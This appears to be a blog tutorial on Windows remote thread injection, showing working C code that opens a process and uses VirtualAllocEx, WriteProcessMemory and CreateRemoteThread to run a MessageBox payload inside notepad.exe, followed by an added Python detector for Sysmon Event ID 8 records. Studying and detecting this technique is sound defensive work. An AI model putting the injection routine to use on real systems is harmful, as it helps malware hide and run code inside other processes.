This post continues the previous one on process enumeration, which we used to find the target process that will host our payload.
Once we have the PID of that process, we can try to open it with the code below. The PID is the process ID obtained from the enumeration step.
```c
#include <windows.h>

// pid: the process ID selected during the enumeration in the previous post
HANDLE hProc = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                           PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
                           FALSE, (DWORD)pid);
if (hProc == NULL) {
    // OpenProcess failed: insufficient privileges, a protected process, or a stale PID
}
```
If the call succeeds, the next step is to inject the payload by creating a thread in the target process.
Below is a very basic remote thread injection routine. I believe this code will trigger a lot of alerts, so be careful when using it.
```c
int Inject(HANDLE hProc, unsigned char* payload, unsigned int payload_len) {
    LPVOID pRemoteCode = NULL;
    HANDLE hThread = NULL;

    // Allocate executable memory in the target process. An executable region that
    // is not backed by any image on disk is the first artefact a scanner notices.
    pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
    if (pRemoteCode == NULL) {
        return -1;
    }
    // Copy the payload bytes into the new region.
    if (!WriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, NULL)) {
        return -1;
    }
    // Start a thread in the target whose entry point is the copied payload.
    hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteCode, NULL, 0, NULL);
    if (hThread != NULL) {
        WaitForSingleObject(hThread, 500);
        CloseHandle(hThread);
        return 0;
    }
    return -1;
}
```
The code above first allocates a new memory region in the target process with VirtualAllocEx, marked executable (PAGE_EXECUTE_READ). Once that region exists, the payload is copied into it with WriteProcessMemory. If the copy succeeds, a new thread is started in the target process with CreateRemoteThread, using the copied payload as its entry point. Each of these three steps is a cross-process action on another process's memory, and every one of them is an observable a defender can log: the source process must hold a handle with PROCESS_VM_OPERATION, PROCESS_VM_WRITE and PROCESS_CREATE_THREAD rights, the target gains an executable region not backed by any file, and the target gains a thread whose start address lies in that region rather than in a loaded module.
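From the defender's side, the last of those three steps is the one most readily logged: Sysmon Event ID 8 ("CreateRemoteThread detected") records the source and target image, the new thread ID, and the thread's start address together with the module and function it resolves to, if any. The added example below (not from the original post) parses a few constructed records in Sysmon's XML export shape and flags the case the injector above produces: a remote thread whose start address resolves to no loaded module, so StartModule and StartFunction are empty. The file paths, PIDs and addresses in the samples are constructed; the TRUSTED_SOURCES allowlist is an assumption to be filled from your own baseline.

```python
"""Flag remote-thread injection from Sysmon Event ID 8 (CreateRemoteThread) records.

Added example, not part of the original post. The XML records are constructed to
mimic a Sysmon export; they are not real telemetry.
"""
import ntpath
import xml.etree.ElementTree as ET
from typing import Dict, List

# Assumption: site-specific allowlist of source image names (lower-case basenames)
# that legitimately create threads in other processes. Empty here on purpose.
TRUSTED_SOURCES = set()

# Constructed sample records (raw strings so the Windows paths need no escaping).
SAMPLE_XML = [
    # 1. What the injector in the post produces: the new thread in notepad.exe starts
    #    in memory that no loaded module backs, so StartModule/StartFunction are empty.
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>8</EventID></System>
  <EventData>
    <Data Name="SourceImage">C:\Users\lab\injector.exe</Data>
    <Data Name="SourceProcessId">4120</Data>
    <Data Name="TargetImage">C:\Windows\System32\notepad.exe</Data>
    <Data Name="TargetProcessId">6544</Data>
    <Data Name="NewThreadId">7728</Data>
    <Data Name="StartAddress">0x000001F3A4C50000</Data>
    <Data Name="StartModule"></Data>
    <Data Name="StartFunction"></Data>
  </EventData>
</Event>""",
    # 2. A remote thread whose start address resolves to a mapped module: still worth
    #    a look, but it is not the unbacked-memory pattern shown above.
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>8</EventID></System>
  <EventData>
    <Data Name="SourceImage">C:\Program Files\Vendor\agent.exe</Data>
    <Data Name="SourceProcessId">2016</Data>
    <Data Name="TargetImage">C:\Windows\System32\notepad.exe</Data>
    <Data Name="TargetProcessId">6544</Data>
    <Data Name="NewThreadId">8120</Data>
    <Data Name="StartAddress">0x00007FFB1A2B3C40</Data>
    <Data Name="StartModule">C:\Windows\System32\ntdll.dll</Data>
    <Data Name="StartFunction">RtlUserThreadStart</Data>
  </EventData>
</Event>""",
]


def parse_event(xml_text: str) -> Dict[str, str]:
    """Flatten one Sysmon event into a dict: EventID plus every <Data Name=...> field."""
    root = ET.fromstring(xml_text)
    event: Dict[str, str] = {}
    for elem in root.iter():
        local = elem.tag.rsplit("}", 1)[-1]  # strip the XML namespace
        if local == "EventID":
            event["EventID"] = (elem.text or "").strip()
        elif local == "Data" and "Name" in elem.attrib:
            event[elem.attrib["Name"]] = (elem.text or "").strip()
    return event


def classify(event: Dict[str, str]) -> str:
    """Return a verdict for one record."""
    if event.get("EventID") != "8":
        return "not-remote-thread-event"
    # ntpath handles the Windows separators regardless of the analysis host's OS.
    source = ntpath.basename(event.get("SourceImage", "")).lower()
    if source in TRUSTED_SOURCES:
        return "allowlisted-source"
    # Sysmon leaves StartModule empty when the start address is inside no loaded
    # module, i.e. a VirtualAllocEx'd region that was written from outside.
    if not event.get("StartModule"):
        return "unbacked-remote-thread"
    return "module-backed-remote-thread"


def find_injections(xml_records: List[str]) -> List[Dict[str, str]]:
    """Return the records that match the unbacked remote-thread pattern."""
    hits = []
    for record in xml_records:
        event = parse_event(record)
        if classify(event) == "unbacked-remote-thread":
            hits.append({
                "source": event["SourceImage"],
                "target": event["TargetImage"],
                "thread": event["NewThreadId"],
                "start": event["StartAddress"],
            })
    return hits


if __name__ == "__main__":
    for hit in find_injections(SAMPLE_XML):
        print(f"ALERT {hit['source']} -> {hit['target']} "
              f"thread {hit['thread']} starts at {hit['start']} (no backing module)")
```

The empty StartModule test is the cheap, high-signal check; in practice you would pair it with the other two observables the post's code generates (a handle to the target opened with write and thread-creation rights, and an executable private region in the target) and with your own allowlist of agents that create remote threads legitimately.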
In Process Hacker we can see the threads of notepad.exe before the payload is injected:

Compare this with the thread list after running the injection:


The payload executes successfully in the newly created thread inside the notepad.exe process. The payload we inject simply calls MessageBox, as shown below. Looking at the details of thread 7728, we can see the MessageBox API being called.
